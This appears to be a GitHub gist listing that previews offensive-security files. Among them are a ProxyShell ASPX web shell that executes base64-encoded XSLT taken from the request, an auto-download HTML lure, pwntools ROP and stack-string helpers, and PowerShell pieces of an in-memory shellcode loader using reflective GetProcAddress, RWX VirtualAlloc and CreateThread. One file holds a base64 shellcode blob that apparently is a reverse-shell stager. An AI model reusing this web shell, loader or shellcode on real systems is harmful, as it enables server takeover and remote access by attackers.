View auto_file_download.html
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!DOCTYPE html> | |
<html> | |
<head> | |
<title>Please Subscribe</title> | |
</head> | |
<body> | |
<script> | |
// File name and contents |
View proxyshell_xsl_transform.cs
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<%@ Page Language="C#" %><% var c=new System.Xml.XmlDocument();c.LoadXml(@"<root>1</root>");var b=new System.Xml.XmlDocument();b.LoadXml(System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String(Request["REDACTED"])));var xct=new System.Xml.Xsl.XslCompiledTransform();xct.Load(b,System.Xml.Xsl.XsltSettings.TrustedXslt,new System.Xml.XmlUrlResolver());xct.Transform(c,null,new System.IO.MemoryStream()); %> |
View stack_string.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
""" | |
# NOTE, you must change the string below for data you want. | |
# This script does not take arguments in its current form. Sorry! | |
""" | |
from pwn import * | |
string = b"foobar" |
View rop_ripper.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
""" | |
# NOTE, you must change the filename below for the rp++ output you want to process. | |
# This script does not take arguments in its current form. Sorry! | |
""" | |
import re | |
from pwn import p32, u32 |
View powershell_invoke.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$t6Y = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((sOH kernel32.dll CreateThread), (b9MW @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$sC6US,[IntPtr]::Zero,0,[IntPtr]::Zero) | |
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((sOH kernel32.dll WaitForSingleObject), (b9MW @([IntPtr], [Int32]))).Invoke($t6Y,0xffffffff) | Out-Null |
View powershell_runner.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$sC6US = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((sOH kernel32.dll VirtualAlloc), (b9MW @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $bUMJ.Length,0x3000, 0x40) | |
[System.Runtime.InteropServices.Marshal]::Copy($bUMJ, 0, $sC6US, $bUMJ.length) |
View powershell_shellcode.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
[Byte[]]$bUMJ = [System.Convert]::FromBase64String("/EiB5PD////ozAAAAEFRQVBSUVZI | |
MdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdBm | |
gXgYCwIPhXIAAACLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1B | |
AcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wg | |
QVL/4FhBWVpIixLpS////11JvndzMl8zMgAAQVZJieZIgeygAQAASYnlSDHAUFBJvAIALLcAAAAAQVRJ | |
ieRMifFBukx3Jgf/1UyJ6mgBAQAAWUG6KYBrAP/VagJZUFBNMclNMcBI/8BIicJBuuoP3+D/1UiJx2oQ | |
QVhMieJIiflBusLbN2f/1Ugx0kiJ+UG6t+k4///VTTHASDHSSIn5Qbp07Dvh/9VIiflIicdBunVuTWH/ | |
1UiBxLACAABIg+wQSIniTTHJagRBWEiJ+UG6AtnIX//VSIPEIF6J9mpAQVloABAAAEFYSInySDHJQbpY | |
pFPl/9VIicNJicdNMclJifBIidpIiflBugLZyF//1UgBw0gpxkiF9nXhQf/nWGoAWbvgHSoKQYna/9U= | |
" |
View powershell_reflection.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function b9MW { | |
Param ( | |
[Parameter(Position = 0, Mandatory = $True)] [Type[]] $feiNr, | |
[Parameter(Position = 1)] [Type] $owXkZ = [Void] | |
) | |
$hawT4 = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate]) | |
$hawT4.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $feiNr).SetImplementationFlags('Runtime, Managed') | |
$hawT4.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $owXkZ, $feiNr).SetImplementationFlags('Runtime, Managed') | |
View powershell_winapi.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function call_win32_api_function { | |
Param ($function_name, $arguments) |
View powershell_gunpowder.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function sOH { | |
Param ($o73, $icO) | |
$zJ3 = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods') | |
return $zJ3.GetMethod('GetProcAddress', [Type[]]@([System.Runtime.InteropServices.HandleRef], [String])).Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($zJ3.GetMethod('GetModuleHandle')).Invoke($null, @($o73)))), $icO)) | |
} |
NewerOlder